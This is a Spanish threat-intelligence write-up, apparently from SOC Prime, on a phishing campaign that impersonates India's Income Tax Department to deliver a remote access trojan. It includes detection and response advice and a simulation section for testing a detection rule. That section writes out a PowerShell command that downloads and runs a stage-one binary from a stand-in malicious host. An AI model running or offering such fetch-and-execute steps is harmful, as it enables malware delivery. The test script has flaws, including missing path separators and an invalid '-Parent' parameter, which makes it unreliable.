SOC Prime Bias: Medio

30 Dec 2025 13:29 UTC

Campaña de Phishing Suplanta al Impuesto sobre la Renta de la India para Atacar a Empresas

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Campaña de Phishing Suplanta al Impuesto sobre la Renta de la India para Atacar a Empresas
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Una operación de phishing que suplanta al Departamento de Impuestos sobre la Renta de la India entrega un PDF con trampa que canaliza a los destinatarios a un portal de cumplimiento falso. El sitio solicita a las víctimas que descarguen un paquete ZIP que contiene un instalador NSIS firmado, el cual despliega un troyano de acceso remoto de múltiples etapas. El RAT persiste creando un servicio de Windows y se comunica con múltiples servidores C2 a través de puertos no estándar.

Investigación

Los investigadores analizaron la trampa en PDF, la URL incrustada y el flujo de trabajo encadenado del instalador NSIS. Documentaron los binarios depositados en el disco, la creación de una carpeta de instalación oculta y el registro de NSecRTS.exe como un servicio de Windows. El informe también capturó las comunicaciones salientes a tres direcciones IP y destacó el uso de cargas útiles firmadas a lo largo de la cadena de entrega.

Mitigación

Bloquee el dominio malicioso y las direcciones IP relacionadas en el perímetro y a través de controles de proxy. Fortalezca las protecciones de correo electrónico para marcar archivos adjuntos y enlaces temáticos de impuestos que conducen a portales de cumplimiento falsos. Evite la ejecución automática de instaladores no confiables cuando sea posible y monitoree la creación de servicios sospechosos, especialmente cualquier cosa nombrada “Windows Real-time Protection Service.”

Respuesta

Alerta sobre los nombres de archivos listados, hashes y la actividad de registro de servicios de Windows vinculada a la cadena de infección. Aísle los puntos finales afectados, adquiera imágenes de memoria y disco, y realice un barrido forense completo para identificar cualquier etapa o herramienta adicional del RAT. Elimine los artefactos de persistencia y restablezca las credenciales potencialmente expuestas para prevenir un reingreso.

Flujo de ataque

Ejecución de Simulación

Requisito Previo: La Verificación Previa de Telemetría y Línea Base debe haber pasado.

Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección.

  • Narrativa del Ataque y Comandos:
    Un adversario entrega un correo electrónico de phishing titulado “Aviso de Impuestos sobre la Renta”. El archivo adjunto es un documento Word malicioso que descarga setup_Ir5swQ3EpeuBpePEpew=.exe to %TEMP%. La víctima ejecuta el archivo, lo que a su vez genera Sibuia.exe (la carga útil verdadera) como su hijo. Esta cadena hijo‑padre está diseñada para eludir alertas genéricas de creación de procesos pero es captada por la regla Sigma.

    Pasos realizados en el host comprometido:

    1. Sueltan el binario de primera etapa:
      $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe"
      Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1
    2. Ejecute el binario de primera etapa:
      Start-Process -FilePath $stage1 -NoNewWindow
    3. El binario de primera etapa crea internamente el segundo binario de etapa Sibuia.exe en el mismo directorio y lo lanza: (Simulado por el script de prueba a continuación.)
  • Script de Prueba de Regresión:
    El script a continuación reproduce la relación exacta padre‑hijo requerida para activar la regla.

    # -------------------------------------------------
    # Simulación de cadena de phishing de Impuestos sobre la Renta de la India
    # -------------------------------------------------
    # Definir rutas
    $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe"
    $stage2 = "$env:TEMPSibuia.exe"
    
    # Crear binarios de prueba (de cero bytes – suficientes para registro de Sysmon)
    Set-Content -Path $stage1 -Value 'REM stage1 placeholder' -Encoding ASCII
    Set-Content -Path $stage2 -Value 'REM stage2 placeholder' -Encoding ASCII
    
    # Asegúrese de que los archivos sean ejecutables (Windows no necesita chmod)
    Write-Host "[*] Lanzando stage1..."
    $proc1 = Start-Process -FilePath $stage1 -PassThru
    
    # Dar a stage1 un momento para “generar” stage2 (simulado por lanzamiento directo)
    Start-Sleep -Milliseconds 500
    
    Write-Host "[*] Stage1 generando stage2 (Sibuia.exe)..."
    $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id
    
    Write-Host "[+] Simulación completa. Verificar detección en SIEM."
    # -------------------------------------------------
  • Comandos de Limpieza:
    Eliminar los artefactos y terminar cualquier proceso persistente.

    # Detener cualquier proceso remanente
    Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force
    Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Eliminar archivos
    Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue
    
    Write-Host "[*] Limpieza completa."